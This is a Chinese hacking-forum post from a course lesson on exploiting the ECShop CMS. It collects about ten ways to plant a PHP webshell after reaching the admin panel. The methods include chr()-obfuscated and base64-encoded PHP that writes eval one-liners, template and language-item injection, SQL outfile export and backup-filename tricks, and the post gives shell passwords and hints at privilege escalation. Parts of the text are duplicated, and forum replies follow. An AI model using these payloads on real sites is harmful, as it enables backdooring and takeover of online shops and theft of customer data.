HACK80 首页  立即注册  登录
现在注册
已注册用户请  登录
HACK80    视频教程

二期公开课第25节-CMS漏洞利用(ecshop)

  •   admin ·2016-6-25 12:26:37·6817 次点击 ·阅读模式     

    马上注册,加入HACK80!与我们一起交流。

    您需要 登录 才可以下载或查看,没有帐号?立即注册

    x
    333.png
    222.png


    课程下载:

    文字描述:


    方法一、
    进后台-订单管理-订单打印-选择插入/编辑图片,然后弹出一个对话框,选择链接菜单-浏览服务器,
    左上角上传类型选择 media,然后就可以直接上传 php 小马。文件路径是:
    /images/upload/Media/xx.php
    方法二、
    后台-订单管理-订单打印-选择源代码编辑-在最后面插入代码-保存-返回订单列表,随意选择一个订
    单打印,返回 OK,生成一句话成功-在根目录生成了一个 null.php,一句话密码:usb
    代码:
    <?php
    $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr
    (112).chr(104).chr(112);
    $filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).ch
    r(97).chr(108).chr(40).chr
    (36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).c
    hr(93).chr(41).chr(59).chr
    (63).chr(62); $a=chr(119); $fp=@fopen($filen,$a); $msg=@fwrite($fp,$filec);
    if($msg) echo chr(79).chr
    (75).chr(33); @fclose($fp); ?>

    方法三、
    &#61623; 进后台
    &#61623; 选择模版管理 - 语言项编辑
    &#61623; 搜索“用户信息” 在用户信息后面加上:
    ${${fputs(fopen(base64_decode(cGNzbGkucGhw),w),base64_decode(PD9w
    aHAgZXZhbCgkX1BPU1RbcGNzbGldKT8+))}} &#61623; 然后确认修改, 访问根目录下 user.php。在同目录下生成 pcsli.php 一句话密码为:pcsli
    方法四、
    系统==>数据库管理==>sql 查询(可爆出物理路径):
    ==============创建表失败,导不出 shell======================
    show databases;
    use 数据库名;
    create a(cmd text not null);
    insert into a(cmd) values(‘<?php eval($_POST[cmd]);?>’);
    select cmd from a into outfile ‘导出路径’;
    drop table if exists a; ==================创建表失败,导不出 shell===================
    方法五、
    前台留个言,内容是我们的一句话木马:<?php eval($_POST[cmd]);?>
    IversOn5 整理

    接着在后台系统==>数据库管理==>数据备份==>选择自定义备份,选择 ecs_feedback 这张表(存放
    留言的表)
    备份文件名:x.php;.sql (x.php.sql 形式出错,菜刀链接不成功)
    然后菜刀链接成功
    http://www.webshell.cc/data/sqldata/x.php;.sql
    方法六、
    1、添加会员,会员名称插入插入一句话 :<?php eval($_POST[cmd]);?> ,其他随便填写。
    2、系统==>数据库管理==>数据备份—自定义备份—选“XXX_users” (其中 XXX 因各站而异,是数据前缀)
    3、备份文件名为 mm.php;.sql
    4、一句话客户端连接 mm.php;.sql,地址一般为 http://www.xxx.com/data/sqldata/mm.php;.sql
    方法七、
    模板管理==>库项目管理==>选择 myship.lbi 配送方式。
    在文件内容最后面加入一句话代码:<?php eval($_POST[cmd]);?>
    菜刀链接 http://www.xxx.com/myship.php 成功。
    说明:有些服务器过滤了 eval 导致失败。
    方法八、
    http://www.xxx.com/includes/fckeditor/editor/filemanager/connectors/test.html
    代码省略
    对 Media 没有任何限制. 直接 Type=Media 上传 你的 解密 webshell
    访问路径为
    http://www.xxx.com/images/upload/Media/xxx.php
    IversOn5 整理

    方法九、
    上传 txt 并且没有过滤任何函数. 于是运用到了 php 的文件操作…
    <script language=”php”>$file =
    file_get_contents(“C:/Inetpub/wwwroot/ecshop/data/Article/1286344719152816497.txt”);
    if($file){
    $file = “C:/Inetpub/wwwroot/ecshop/data/Article/1286344719152816497.txt”;
    $newfile = ‘C:/Inetpub/wwwroot/ecshop/data/distant.php;a.txt’;
    copy($file,$newfile);
    }</script>
    将以上代码插入库项目管理中的 myship.ini
    打开 http://www.xxx.com/myship.php
    即在 http://www.xxx.com/data/目录下生成 distant.php;a.txt
    菜刀连接之…搞定.. 方法十、
    进入后台-系统设置-Flash 播放器管理- 直接上传 x.php
    ecshop V2.7.2 版本已经没有这个选项 ,所以这个已经失效。
    本站内容均为原创,转载请务必保留署名与链接!
    ecshop 后台拿 shell 个人总结七种方法:http://www.webshell.cc/1625.html
    入后台后,在 menu 里的 模板管理>库项目管理 , 然后选择 myship.lbi,直接写入一句
    话,地址 xxx.com/myship.php 大刀连接,上传大马….接下来…好了不说了 ,提权..你懂
    得!
    不过如上上述方法失败了,那就是版本更新了,其他的老办法(flash 任意上传,slq 导出
    等等)也都不好使了,用这个高大上的方法把,后台-邮件模版-编辑,把内容修改成
    {$user_name’];file_put_contents(base64_decode(‘Li4vdGVtcC9zaGVsbC5waHA=’),
    base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz4=’));echo
    $var[‘$user_name}
    </p>
    <p>{$user_name}您好!<br />
    <br />
    您已经进行了密码重置的操作,请点击以下链接(或者复制到您的浏览器):<br />
    <br />
    <a target=”_blank” href=”{$reset_email}”>{$reset_email}</a><br />
    <br />
    以确认您的新密码重置操作!<br />
    <br />
    {$shop_name}<br />
    {$send_date}</p>
    点击确定,在后台登陆地方点忘记密码,输入用户和邮箱 (这个在后台随便找个用户就
    OK)提交就会在 temp 下生成 shell.php 一句话木马,密码是 207
    IversOn5 整理

    Li4vdGVtcC9zaGVsbC5waHA= 用 base64 解密就是 ../temp/shell.php
    鸣谢:
    感谢那些用自己的时间来写帖子的大牛们!我只是收集过来,整理而已。
    Tips:还请大家能够怀着感谢的心来使用这些方法!
    注:请勿使用本文所说的方法来攻击破坏他人计算机系统,如若出现非法行为,与本人无关!

    }</script>
    将以上代码插入库项目管理中的 myship.ini
    打开 http://www.xxx.com/myship.php
    即在 http://www.xxx.com/data/目录下生成 distant.php;a.txt
    菜刀连接之…搞定.. 方法十、
    进入后台-系统设置-Flash 播放器管理- 直接上传 x.php
    ecshop V2.7.2 版本已经没有这个选项 ,所以这个已经失效。
    本站内容均为原创,转载请务必保留署名与链接!
    ecshop 后台拿 shell 个人总结七种方法:http://www.webshell.cc/1625.html
    入后台后,在 menu 里的 模板管理>库项目管理 , 然后选择 myship.lbi,直接写入一句
    话,地址 xxx.com/myship.php 大刀连接,上传大马….接下来…好了不说了 ,提权..你懂
    得!
    IversOn5 整理
    from 5 号黯区
    Blog:http://iverson5.blog.163.com
    不过如上上述方法失败了,那就是版本更新了,其他的老办法(flash 任意上传,slq 导出
    等等)也都不好使了,用这个高大上的方法把,后台-邮件模版-编辑,把内容修改成
    {$user_name’];file_put_contents(base64_decode(‘Li4vdGVtcC9zaGVsbC5waHA=’),
    base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz4=’));echo
    $var[‘$user_name}
    </p>
    <p>{$user_name}您好!<br />
    <br />
    您已经进行了密码重置的操作,请点击以下链接(或者复制到您的浏览器):<br />
    <br />
    <a target=”_blank” href=”{$reset_email}”>{$reset_email}</a><br />
    <br />
    以确认您的新密码重置操作!<br />
    <br />
    {$shop_name}<br />
    {$send_date}</p>
    点击确定,在后台登陆地方点忘记密码,输入用户和邮箱 (这个在后台随便找个用户就
    OK)提交就会在 temp 下生成 shell.php 一句话木马,密码是 207Blog:http://iverson5.blog.163.com
    Li4vdGVtcC9zaGVsbC5waHA= 用 base64 解密就是 ../temp/shell.php
    鸣谢:
    感谢那些用自己的时间来写帖子的大牛们!我只是收集过来,整理而已。
    Tips:还请大家能够怀着感谢的心来使用这些方法!
    注:请勿使用本文所说的方法来攻击破坏他人计算机系统,如若出现非法行为,与本人无关!



    6817 次点击 · 2 人收藏  
    收藏  转播  分享
    20 回复
      Reply  
    忆寒  2016-6-25 16:05:39 
    楼主,替我问候您主治大夫!
      Reply  
    rojadoo  2016-6-25 12:26:38 
    看帖回帖是美德!{:4_111:}
      Reply  
    songtao10  2016-6-25 12:27:19 
    看在楼主的面子上,认真回帖!
      Reply  
    MiracleEgo  2016-6-25 12:53:41 
    楼上是GG还是MM啊?
      Reply  
    求虐002  2016-6-25 12:55:46 
    楼上的能详细介绍一下么?
      Reply  
    戴花  2016-6-25 13:26:39 
    提示: 作者被禁止或删除 内容自动屏蔽
      Reply  
    戴花  2016-6-25 14:26:42 
    提示: 作者被禁止或删除 内容自动屏蔽
      Reply  
    a985352332  2016-6-25 14:30:43 
    不是已经发过了?
      Reply  
    coverme  2016-6-25 15:30:20 
    好东西,赞一个!
    123下一页
    添加一条新回复
    您需要登录后才可以回帖 登录 | 立即注册

    本节点积分规则
    QQ
    小黑屋   ·   手机版   ·   171 人在线 最高记录 5500   ·   TOP
    我们很年轻,但我们有信念、有梦想!

      我们坚信只有今天付出了,才有机会看到明天的太阳!现在!加入我们,给你一个气氛优秀的技术圈子。  
    GMT+8, 2018-5-21 01:27, Processed in 0.052683 second(s), 26 queries .